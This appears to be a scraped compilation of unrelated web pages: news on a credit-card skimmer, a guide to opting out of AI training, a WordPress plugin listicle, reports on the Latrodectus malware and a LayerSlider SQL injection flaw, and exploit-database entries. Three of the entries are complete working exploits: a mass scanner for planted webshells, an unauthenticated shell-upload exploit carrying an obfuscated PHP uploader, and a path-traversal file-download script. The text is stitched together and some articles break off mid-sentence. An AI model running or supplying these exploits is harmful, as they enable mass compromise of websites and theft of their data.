Cybersecurity researchers have discovered a credit card skimmer that's concealed within a fake Meta Pixel tracker script in an attempt to evade detection.
Sucuri said that the malware is injected into websites through tools that allow for custom code, such as WordPress plugins like Simple Custom CSS and JS or the "Miscellaneous Scripts" section of the Magento admin panel.
"

Sneaky Credit Card Skimmer Disguised as Harmless Facebook Tracker

Some companies let you opt out of allowing your content to be used for generative AI. Here’s how to take back (at least a little) control from ChatGPT, Google’s Gemini, and more.

If you’ve ever posted something to the internet—a pithy tweet, a 2009 blog post, a scornful review, or a selfie on Instagram—it has most likely been slurped up and used to help train the current wave of generative AI. Large language models, like ChatGPT, and image creators are powered by vast reams of our data. And even if it’s not powering a chatbot, the data can be used for other machine-learning features.

Tech companies have scraped vast swathes of the web to gather the data they claim is needed to create generative AI—with little regard for content creators, copyright laws, or privacy. On top of this, increasingly, firms with reams of people’s posts are looking to get in on the AI gold rush by selling or licensing that information. Looking at you, Reddit.

However, as the lawsuits and investigations around generative AI and its opaque data practices pile up, there have been small moves to give people more control over what happens to what they post online. Some companies now let individuals and business customers opt out of having their content used in AI training or being sold for training purposes. Here’s what you can—and can’t—do.

**There’s a Limit**

Before we get to how you can opt out, it’s worth setting some expectations. Many companies building AI have already scraped the web, so anything you’ve posted is probably already in their systems. Companies are also secretive about what they have actually scraped, purchased, or used to train their systems. “We honestly don't know that much,” says Niloofar Mireshghallah, a researcher who focuses on AI privacy at the University of Washington. “In general, everything is very black-box.”

Mireshghallah explains that companies can make it complicated to opt out of having data used for AI training, and even where it is possible, many people don’t have a “clear idea” about the permissions they’ve agreed to or how data is being used. That’s before various laws, such as copyright protections and Europe’s strong privacy laws, are taken into consideration. Facebook, Google, X, and other companies have written into their privacy policies that they may use your data to train AI.

While there are various technical ways AI systems could have data removed from them or “unlearn,” Mireshghallah says, there’s very little that’s known about the processes that are in place. The options can be buried or labor-intensive. Getting posts removed from AI training data is likely to be an uphill battle. Where companies are starting to allow opt-outs for future scraping or data sharing, they are almost always making users opt-in by default.

“Most companies add the friction because they know that people aren’t going to go looking for it,” says Thorin Klosowski, a security and privacy activist at the Electronic Frontier Foundation. “Opt-in would be a purposeful action, as opposed to opting out, where you have to know it’s there.”

While less common, some companies building AI tools and machine learning models don't automatically opt-in customers. “We do not train our models on user-submitted data by default. We may use user prompts and outputs to train Claude where the user gives us express permission to do so, such as clicking a thumbs up or down signal on a specific Claude output to provide us feedback,” says Jennifer Martinez, a spokesperson for Anthropic. In this situation, the most recent iteration of the company’s Claude chatbot is built on public information online and third-party data—content people posted elsewhere online—but not user information.

The majority of this guide deals with opt-outs for text, but artists have also been using “Have I Been Trained?” to signal their images shouldn't be used for training. Run by startup Spawning, the service allows people to see if their creations have been scraped and then opt out of any future training. “Anything with a URL can be opted out. Our search engine only searches images, but our browser extension lets you opt out any media type,” says Jordan Meyer, cofounder and CEO of Spawning. Stability AI, the startup behind a text-to-image tool called Stable Diffusion, is among companies that say they are honoring the system.

The list below only includes companies currently with an opt-out process. For example, Microsoft’s Copilot does not offer users with personal accounts the option to have their prompts not used to improve the software. “A portion of the total number of user prompts in Copilot and Copilot Pro responses are used to fine-tune the experience,” says Donny Turnbaugh, a spokesperson for Copilot. “Microsoft takes steps to deidentify data before it is used, helping to protect consumer identity.” Even if the data is deidentified, privacy-minded users may want more potential control over their information.

**How to Opt Out of AI Training**

Adobe

Adobe via Matt Burgess

If you store your files in Adobe’s Creative Cloud, the company may use them to train its machine-learning algorithm. “When we analyze your content for product improvement and development purposes, we first aggregate your content with other content and then use the aggregated content to train our algorithms and thus improve our products and services,” reads the company’s FAQ. This doesn’t apply to any files stored only on your device.

If you’re using a personal Adobe account, it’s easy to opt out. Open up Adobe’s **privacy page**, scroll down to the **Content analysis** section, and click the toggle to turn it off. For business or school accounts, the opt-out process is not available on the individual level, and you’ll have to reach out to your administrator.

Amazon: AWS

AI services from Amazon Web Services, like Amazon Rekognition or Amazon CodeWhisperer, may save customer data to improve the company’s tools. Head’s up, this is the most complicated opt-out process included in the roundup, so you likely need help from an IT professional at your company or an AWS representative to perform it successfully. Outlined on this support page from Amazon, the process includes enabling the option for your organization, creating a policy, and attaching that policy where necessary.

Google: Gemini

For users of Google’s chatbot, Gemini, conversations may sometimes be selected for human review to improve the AI model. Opting out is simple, though. Open up Gemini in your browser, click on **Activity**, and select the **Turn Off** drop-down menu. Here you can just turn off the Gemini Apps Activity, or you can opt out as well as delete your conversation data. While this does mean in most cases that future chats won’t be seen for human review, already selected data is not erased through this process. According to Google’s privacy hub for Gemini, these chats may stick around for three years.

Grammarly

Grammarly does not currently offer an opt-out process for personal accounts, but self-serve business accounts can choose to opt out from having their data used to train Grammarly’s machine-learning model. Turn it off by opening up your **Account Settings**, clicking on the **Data Settings** tab, and toggling off **Product Improvement & Training**. If you have a managed business account, which includes accounts for classroom education and accounts bought through a Grammarly sales representative, you are automatically opted out from AI model training.

HubSpot

HubSpot, a popular marketing software, automatically uses data from customers to improve its machine-learning model. Unfortunately, there’s not a button to press to turn off the use of data for AI training. You have to **send an email** to privacy@hubspot.com with a message requesting that the data associated with your account be opted out.

OpenAI: ChatGPT and Dall-E

OpenAI via Matt Burgess

People reveal all sorts of personal information while using a chatbot. OpenAI provides some options for what happens to what you say to ChatGPT—including allowing its future AI models not to be trained on the content. “We give users a number of easily accessible ways to control their data, including self-service tools to access, export, and delete personal information through ChatGPT. That includes easily accessible options to opt out from the use of their content to train models,” says Taya Christianson, an OpenAI spokesperson. (The options vary slightly depending on your account type, and data from enterprise customers is not used to train models).

On its help pages, OpenAI says ChatGPT web users without accounts should navigate to **Settings** and then uncheck **Improve the model for everyone**. If you have an account and are logged in through a web browser, select **ChatGPT, Settings, Data Controls,** and then turn off **Chat History & Training**. If you’re using ChatGPT’s mobile apps, go to **Settings**, pick **Data Controls,** and turn off **Chat History & Training**. Changing these settings, OpenAI’s support pages say, won’t sync across different browsers or devices, so you need to make the change everywhere you use ChatGPT.

OpenAI is about a lot more than ChatGPT. For its Dall-E 3 image generator, the startup has a **form that allows you to send images** to be removed from “future training datasets.” It asks for your name, email, whether you own the image rights or are getting in touch on behalf of a company, details of the image, and any uploads of the image(s). OpenAI also says if you have a “high volume” of images hosted online that you want removed from training data, then it may be “more efficient” to add GPTBot to the robots.txt file of the website where the images are hosted.

Traditionally a website’s robots.txt file—a simple text file that usually sits at websitename.com/robots.txt—has been used to tell search engines, and others, whether they can include your pages in their results. It can now also be used to tell AI crawlers not to scrape what you have published—and AI companies have said they’ll honor this arrangement.

Perplexity

Perplexity is a startup that uses AI to help you search the web and find answers to questions. Like all of the other software on this list, you are automatically opted in to having your interactions and data used to train Perplexity’s AI further. Turn this off by clicking on your **account name**, scrolling down to the **Account** section, and turning off the **AI Data Retention** toggle.

Quora

Quora via Matt Burgess

Quora says it “currently” doesn’t use answers to people’s questions, posts, or comments for training AI. It also hasn’t sold any user data for AI training, a spokesperson says. However, it does offer opt-outs in case this changes in the future. To do this, visit its **Settings** page, click to **Privacy,** and turn off the “**Allow large language models to be trained on your content**” option. Despite this choice, there are some Quora posts that may be used for training LLMs. If you reply to a machine-generated answer, the company’s help pages say, then those answers may be used for AI training. It points out that third parties may just scrape its content anyway.

Rev

Rev, a voice transcription service that uses both human freelancers and AI to transcribe audio, says it uses data “perpetually” and “anonymously” to train its AI systems. Even if you delete your account, it will still train its AI on that information.

Kendell Kelton, head of brand and corporate communications at Rev, says it has the “largest and most diverse data set of voices,” made up of more than 6.5 million hours of voice recording. Kelton says Rev does not sell user data to any third parties. The firm’s terms of service say data will be used for training, and that customers are able to opt out. People can opt out of their data being used by **sending an email** to support@rev.com, its help pages say.

Slack

All of those random Slack messages at work might be used by the company to train its models as well. “Slack has used machine learning in its product for many years. This includes platform-level machine-learning models for things like channel and emoji recommendations,” says Jackie Rocca, a vice president of product at Slack who’s focused on AI.

Even though the company does not use customer data to train a large language model for its Slack AI product, Slack may use your interactions to improve the software’s machine-learning capabilities. “To develop AI/ML models, our systems analyze Customer Data (e.g. messages, content, and files) submitted to Slack,” says Slack’s privacy page. Similar to Adobe, there’s not much you can do on an individual level to opt out if you’re using an enterprise account.

The only real way to opt out is to have your administrator email Slack at feedback@slack.com. The message must have the subject line “Slack Global model opt-out request” and include your organization's URL. Slack doesn’t provide a timeline for how long the opt-out process takes, but it should send you a confirmation email after it’s complete.

Squarespace

Website-building tool Squarespace has built in a toggle to stop AI crawlers from scraping websites it hosts. This works by updating your website’s robots.txt file to tell AI companies the content is off limits. To block the AI bots, open **Settings** within your account, find **Crawlers**, and turn off **Artificial Intelligence Crawlers**. It points out this should work for the following crawlers: Anthropic, OpenAI’s GPTBot and ChatGPT-User, Google Extended, and CCBot.

Substack

If you use Substack for blog posts, newsletters, or more, the company also has an easy option to apply the robots.txt opt-out. Within your **Settings** page, scroll to the **Publication** section and turn on the toggle to **Block AI training**. Its help page points out: “This will only apply to AI tools that respect this setting.”

Tumblr

Blogging and publishing platform Tumblr—owned by Automattic, which also owns WordPress—says it is “working with” AI companies that are “interested in the very large and unique set of publicly published content” on the wider company’s platforms. This doesn’t include user emails or private content, an Automattic spokesperson says.

Tumblr has a “prevent third-party sharing” option to stop what you publish being used for AI training, as well as being shared with other third parties such as researchers. If you’re using the Tumblr app, go to account S**ettings**, select your blog, click on the **gear icon**, select **Visibility**, and toggle the “**Prevent third-party sharing**” option. Explicit posts, deleted blogs, and those that are password-protected or private, are not shared with third-party companies in any case, Tumblr’s support pages say.

WordPress

Wordpress via Matt Burgess

Like Tumblr, WordPress has a “prevent third-party sharing” option. To turn this on, visit your website’s dashboard, click on **Settings**, **General**, and then through to **Privacy**, select the **Prevent third-party sharing** box. “We are also trying to work with crawlers (like https://commoncrawl.org/) to prevent content from being scraped and sold without giving our users choice or control over how their content is used,” an Automattic spokesperson says.

Your Website

If you are hosting your own website, you can update your robots.txt file to tell AI bots not to scrape the pages. Most news websites don’t allow their articles to be crawled by AI bots. WIRED’s robots.txt file, for example, doesn’t allow bots from OpenAI, Google, Amazon, Facebook, Anthropic, or Perplexity, among others. This opt-out isn’t just for publishers though: Any website, big or small, can alter its robots file to exclude AI crawlers. All you need to do is add a disallow command; working examples can be found here.

How to Stop Your Data From Being Used to Train AI

By Owais Sultan
WordPress, a widely used content management system, owes a great deal of its flexibility to plugins. These small…
This is a post from HackRead.com Read the original post: The Essential Tools and Plugins for WordPress Development

WordPress, a widely used content management system, owes a great deal of its flexibility to plugins. These small software components effortlessly improve the functionality of your website. Having the right resources and tools is crucial for developers venturing into WordPress development services. Let’s explore the essential elements that can facilitate and enhance your journey in this field.

****Essential Tools for WordPress Development****

WordPress powers millions of websites worldwide (472 million), from personal blogs to enterprise-level e-commerce platforms. Developers face challenges in such a diverse ecosystem, from writing clean and efficient code to ensuring seamless website deployment and maintenance. The right tools act as enablers, empowering developers to navigate these challenges easily and precisely.

****Code Editors****

Choosing a suitable code editor is akin to selecting the right brush for an artist. Versatile editors like Visual Studio Code or Sublime Text provide many features such as syntax highlighting, auto-completion, and Git integration. These features enhance productivity and foster a conducive environment for writing clean, maintainable code.

****Local Development Environments****

Developing and testing WordPress websites on a live server can be risky and inefficient. Local development environments, facilitated by tools like XAMPP, MAMP, or Docker, provide a safe and controlled environment for experimentation and iteration. Developers can test new features, plugins, and themes without fearing disrupting the live website, ensuring a seamless user experience upon deployment.

****Version Control Systems****

Version control systems like Git are the backbone of efficient teamwork in a collaborative development environment. Paired with platforms like GitHub or Bitbucket, these systems enable developers to manage code changes seamlessly, collaborate with team members in real time, and maintain a comprehensive project history. This fosters a cohesive and organized development environment, ensuring everyone is on the same page throughout the development lifecycle.

****Debugging Tools****

No code is perfect, and debugging is inevitable in the development process. Specialized debugging tools like Query Monitor or Debug Bar provide developers with invaluable insights into the inner workings of their WordPress projects. These tools are indispensable for maintaining a robust and efficient website, from identifying and troubleshooting issues to monitoring performance and optimizing the codebase.

****Must-Have Plugins for WordPress Development****

WordPress’s flexibility and extensibility are key factors contributing to its popularity among developers worldwide. However, the sheer volume of available plugins can be overwhelming, making it essential for developers to discern and integrate the most suitable ones into their projects. Here’s why selecting the right plugins is imperative for effective WordPress development:

****SEO Plugins****

Optimizing websites for search engines is essential for driving organic traffic and enhancing visibility. SEO plugins like Yoast SEO or Rank Math provide developers with robust tools to optimize their WordPress sites effectively. Features such as XML sitemap generation, meta tag optimization, and comprehensive content analysis empower developers to bolster their site’s visibility and relevance in search engine results, increasing organic traffic and user engagement.

****Performance Optimization Plugins****

User experience is paramount in retaining visitors and fostering engagement on WordPress websites. Performance optimization plugins such as WP Rocket or W3 Total Cache offer many optimization features to improve site speed and performance. From caching mechanisms to asset minification and lazy loading, these plugins ensure a snappier and more responsive user experience, leading to higher user satisfaction and retention.

****Security Plugins****

Protecting WordPress websites against security threats is a top priority for developers. Security plugins like Wordfence or Sucuri Security fortify the site’s defences with features such as firewall protection, malware scanning, and enhanced login security. By implementing these plugins, developers can ensure peace of mind against potential threats and vulnerabilities, safeguarding their websites and user data from malicious attacks.

****Development & Debugging Plugins****

Efficient development workflows are essential for maintaining productivity and delivering high-quality WordPress projects. Development and debugging plugins such as Query Monitor or Debug Bar streamline debugging and optimization by providing critical insights into database queries, PHP errors, and HTTP requests. By leveraging these plugins, developers can identify and address issues swiftly, ensuring the seamless operation of WordPress projects and minimizing development time.

****Elevate Your WordPress Development Experience****

Integrating these indispensable tools and plugins into your WordPress development arsenal empowers you to transcend boundaries, streamline processes, and unlock the full potential of your projects. By staying abreast of the latest advancements in the WordPress ecosystem, you can continually refine and optimize your development practices, fostering innovation and excellence in your endeavours.

1.  What To Look For In The Best WordPress Hosting
2.  What is WooCommerce, and Why You Should Care
3.  Kotlin app development company – How to choose
4.  Tips for Using Uploader Widgets on WordPress Blogs
5.  MySQL Performance Tuning: 5 Tips for Blazing Fast Queries

The Essential Tools and Plugins for WordPress Development

WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.

    # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = {    'Connection': 'keep-alive',    'Cache-Control': 'max-age=0',    'Upgrade-Insecure-Requests': '1',    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107Mobile Safari/537.36',    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',    'Referer': 'www.google.com'}def URLdomain(url):    if url.startswith("http://"):        url = url.replace("http://", "")    elif url.startswith("https://"):        url = url.replace("https://", "")    if '/' in url:        url = url.split('/')[0]    return urldef check_security(url):    fg = success_color    fr = error_color    try:        url = 'http://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/travelscape/json.php', headers=headers,allow_redirects=True, timeout=15)        if 'MSQ_403' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/travelscape/json.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/themes/aahana/json.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'MSQ_403' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/aahana/json.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))        check = requests.get(url + '/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url +'/wp-content/themes/travel/issue.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url + '/about.php', headers=headers,allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/about.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/digital-download/new.php', headers=headers,allow_redirects=True, timeout=15)        if '#0x2525' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('digital-download.txt', 'a').write(url +'/wp-content/themes/digital-download/new.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'http://' + URLdomain(url)        check = requests.get(url + '/epinyins.php', headers=headers,allow_redirects=True, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/epinyins.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'https://' + URLdomain(url)        check = requests.get(url + '/wp-admin/dropdown.php',headers=headers, allow_redirects=True, verify=False, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'Simple Shell' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('dummyyummy.txt', 'a').write(url +'/wp-content/plugins/dummyyummy/wp-signup.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))    except Exception as e:        print(f' -| {url} --> {fr}[Failed] due to: {e}')def main():    try:        url_file_path = sys.argv[1]    except IndexError:        url_file_path = input(f"{info_color}Enter the path to the filecontaining URLs: ")        if not os.path.isfile(url_file_path):            print(f"{error_color}[ERROR] The specified file path isinvalid.")            sys.exit(1)    try:        urls_to_check = [line.strip() for line in open(url_file_path, 'r',encoding='utf-8').readlines()]    except Exception as e:        print(f"{error_color}[ERROR] An error occurred while reading thefile: {e}")        sys.exit(1)    pool = ThreadPool(20)    pool.map(check_security, urls_to_check)    pool.close()    pool.join()    print(f"{info_color}Security check process completed successfully.Results are saved in corresponding files.")if __name__ == "__main__":    main()

WordPress Travelscape Theme 1.0.3 Arbitrary File Upload

By Waqas
Another day, another malware threat!
This is a post from HackRead.com Read the original post: New Latrodectus Downloader Malware Linked to IcedID and Qbot Creators

Image credit: Hackread.com

A new malware threat named Latrodectus has emerged, bypassing detection methods and linked to the developers behind IcedID. This downloader malware empowers cybercriminals (including infamous actors like TA577 and TA588) to breach systems and deploy various malicious payloads.

Cybersecurity researchers at Proofpoint have identified a new malware threat dubbed “Latrodectus.” First observed in November 2023, Latrodectus is a downloader malware used by cybercriminals to gain initial access to victim systems and deploy further malicious payloads.

This malware poses a major threat due to its ability to evade detection techniques commonly employed in sandboxes, which are security environments used to analyze suspicious code.

****Latrodectus: A New Player with Familiar Traits****

Initial analysis suggested Latrodectus might be a variant of the notorious IcedID malware. However, further investigation revealed it to be an entirely new strain, likely created by the same developers behind IcedID. This connection is supported by shared infrastructure and code characteristics.

****Initial Access Brokers Leverage Latrodectus****

Proofpoint report shared with Hackread.com on Thursday 04, 2024 ahead of publication on Tuesday attributes Latrodectus to two specific threat actors: TA577 and TA578. It is worth mentioning that TA578 is known for delivering malware threats like BazaLoader, Cobalt Strike, Ursnif, and KPOT Stealer.

On the other hand, TA577 is infamous for having served as a key affiliate of the Qbot network until its recent disruption. TA577 has been linked by Proofpoint to various campaigns, with subsequent ransomware infections such as Black Basta being notably attributed to them.

These actors are classified as Initial Access Brokers (IABs), specializing in gaining initial footholds within victim networks. Latrodectus serves as their tool to establish a foothold and potentially deploy ransomware or other malicious tools.

Commenting on this, Ken Dunham, Cyber Threat Director at Qualys Threat Research Unit told Hackread.com, _“_Battling eCrime is similar to moving a couch where roaches live, they simply run to another piece of furniture or room nearby to seek harbour and continue business as normal, despite any actions taken by the homeowner._“_

_“_Latrodectus has powerful components upon its emergence, capable of defeating sandboxes, use of RC4 encrypted command and control communications, and more,_“_ Ken warned. _“_It appears likely that actors behind QBot felt the heat from takedowns last year, migrating to this new code base and infrastructure in the fall of 2023._“_

While Latrodectus activity dropped in December 2023 and January 2024, Proofpoint reports a surge in campaigns throughout February and March 2024. This suggests a growing adoption of Latrodectus by cybercriminals.

The specific payloads delivered by Latrodectus remain unknown, but its downloader functionality allows attackers to deploy a wide range of tools through malicious emails depending on their objectives.

Two of the malicious emails used in the campaign to spread Latrodectus (Screenshot: Proofpoint)

While technical details of Latrodectus’s modus operandi are available in Proofpoint’s blog post, here are some to mitigate the risk of Latrodectus:

*   **Maintain strong cybersecurity hygiene:** Regularly update software and firmware on all devices. Utilize robust security solutions with advanced malware detection capabilities.
*   **Be cautious of suspicious emails:** Phishing emails are a common method for distributing malware. Be wary of unsolicited attachments and links.
*   **Educate employees:** Train employees on cybersecurity best practices, including email security awareness and the importance of reporting suspicious activity.

1.  New Malware “BunnyLoader 3.0” Steals Credentials
2.  WordPress Websites Hacked with New Sign1 Malware
3.  TheMoon Malware Hacks 6,000 Asus Routers in 72 Hours
4.  AcidRain Linux Malware Variant “AcidPour” Targeting Ukraine
5.  New Vcurms Malware Targets Popular Browsers for Data Theft

New Latrodectus Downloader Malware Linked to IcedID and Qbot Creators

A researcher received a $5,500 bug bounty for discovering a vulnerability (CVE-2024-2879) in LayerSlider, a plug-in with more than a million active installations.

Source: Primakov via Shutterstock

Attackers can exploit a critical SQL injection vulnerability found in a widely used WordPress plug-in to compromise more than 1 million sites and extract sensitive data such as password hashes from associated databases.

A security researcher called AmrAwad (aka 1337\_Wannabe) discovered the bug in the LayerSlider, a plug-in for creating animated Web content. The security flaw, tracked as CVE-2024-2879, has a rating of 9.8 out of 10 on the CVSS 3.0 vulnerability-severity scale, and is associated with the "ls\_get\_popup\_markup" action in versions 7.9.11 and 7.10.0 of LayerSlider. The vulnerability is due to "insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query," according to Wordfence.

"This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database," the company said.

Wordfence awarded the researcher a bounty of $5,500 — the company's highest bounty to date — for the discovery, according to a blog post by Wordfence. AmrAwad's March 25 submission came as part of Wordfence's second Bug Bounty Extravaganza, and the company contacted the Kreatura Team, developers of the plug-in, the same day to notify them of the flaw. The team responded the next day and delivered a patch in version 7.10.1 of LayerSlider on March 27.

**Exploiting the LayerSlider SQL Injection Flaw**

The potential for exploitation of the vulnerability lies in the insecure implementation of the LayerSlider plug-in's slider popup markup query functionality, which has an "id" parameter, according to Wordfence.

According to the firm, "if the 'id' parameter is not a number, it is passed without sanitization to the find() function in the LS\_Sliders class," which "queries the sliders in a way that constructs a statement without the prepare() function."  

Since that function would "parameterize and escape the SQL query for safe execution in WordPress, thereby providing protection against SQL injection attacks," its absence creates a vulnerable scenario, according to Wordfence.

However, to exploit the flaw requires a "a time-based blind approach" on the part of attackers to extract database information, which is "an intricate, yet frequently successful method to obtain information from a database when exploiting SQL Injection vulnerabilities," according to Wordfence.

"This means that they would need to use SQL CASE statements along with the SLEEP() command while observing the response time of each request to steal information from the database," the company explained.

**Secure WordPress, Secure the Web**

Vulnerable WordPress sites are a popular target for attackers given the content management system's widespread use across the Internet, and often vulnerabilities exist in plug-ins that independent developers create for adding functionality to sites using the platform.

Indeed, at least 43% of websites on the entire Internet use WordPress to power their sites, e-commerce applications, and communities. Further, the wealth of sensitive data such as user passwords and payment info often stored within their pages represents a significant opportunity for threat actors who seek to misuse it.

Making "the WordPress ecosystem more secure ... ultimately makes the entire web more secure," WordPress noted.

Wordfence advised that WordPress users with LayerSlider installed on sites verify immediately that they are updated to the latest, patched version of the plug-in to ensure it isn't vulnerable to exploit.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Critical Security Flaw Exposes 1 Million WordPress Sites to SQL Injection

WordPress Membership for WooCommerce plugin versions prior to 2.1.7 suffer from a remote shell upload vulnerability.

    # Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)# Date: 2024-02-25# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sys , requests, re , jsonfrom multiprocessing.dummy import Poolfrom colorama import Forefrom colorama import initinit(autoreset=True)headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0','Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, likeGecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','Accept-Encoding': 'gzip, deflate', 'Accept-Language':'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}uploader = """GIF89a<?php ?><!DOCTYPE html><html><head>  <title>Resultz</title></head><body><h1>Uploader</h1>  <form enctype='multipart/form-data' action='' method='POST'>    <p>Uploaded</p>    <input type='file' name='uploaded_file'></input><br />    <input type='submit' value='Upload'></input>  </form></body></html><?PHPif(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echobase64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echobase64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>"""requests.urllib3.disable_warnings()def Exploit(Domain):    try:        if 'http' in Domain:          Domain = Domain        else:          Domain = 'http://'+Domain        myup = {'': ('db.php', uploader)}        req = requests.post(Domain +'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',files=myup, headers=headers,verify=False, timeout=10).text        req1 = requests.get(Domain +'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')        if 'Ex3ptionaL' in req1:          print (fg+'[+] '+ Domain + ' --> Shell Uploaded')          open('Shellz.txt', 'a').write(Domain +'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')        else:          print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')    except:        print(fr+' -| ' + Domain + ' --> {} [Failed]')target = open(input(fm+"Site List: "), "r").read().splitlines()mp = Pool(int(input(fm+"Threads: ")))mp.map(Exploit, target)mp.close()mp.join()

WordPress Membership For WooCommerce Shell Upload

A critical security flaw impacting the LayerSlider plugin for WordPress could be abused to extract sensitive information from databases, such as password hashes.
The flaw, designated as CVE-2024-2879, carries a CVSS score of 9.8 out of a maximum of 10.0. It has been described as a case of SQL injection impacting versions from 7.9.11 through 7.10.0.
The issue has been addressed in version

Critical Security Flaw Found in Popular LayerSlider WordPress Plugin

WordPress Simple Backup plugin versions prior to 2.7.10 suffer from file download and path traversal vulnerabilities.

    # Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal# Date: 2024-03-06# Exploit Author: Ven3xy# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip# Version: 2.7.10# Tested on: Linuximport sysimport requestsfrom urllib.parse import urljoinimport timedef exploit(target_url, file_name, depth):    traversal = '../' * depth    exploit_url = urljoin(target_url, '/wp-admin/tools.php')    params = {        'page': 'backup_manager',        'download_backup_file': f'{traversal}{file_name}'    }    response = requests.get(exploit_url, params=params)    if response.status_code == 200 and response.headers.get('Content-Disposition') \            and 'attachment; filename' in response.headers['Content-Disposition'] \            and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:        print(response.text)  # Replace with the desired action for the downloaded content        file_path = f'simplebackup_{file_name}'        with open(file_path, 'wb') as file:            file.write(response.content)        print(f'File saved in: {file_path}')    else:        print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")if __name__ == "__main__":    if len(sys.argv) != 4:        print("Usage: python exploit.py <target_url> <file_name> <depth>")        sys.exit(1)    target_url = sys.argv[1]    file_name = sys.argv[2]    depth = int(sys.argv[3])    print("\n[+] Exploit Coded By - Venexy    ||    Simple Backup Plugin 2.7.10  EXPLOIT\n\n")    time.sleep(5)    exploit(target_url, file_name, depth)

WordPress Simple Backup Path Traversal / Arbitrary File Download

WordPress Gutenberg plugin version 18.0.0 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

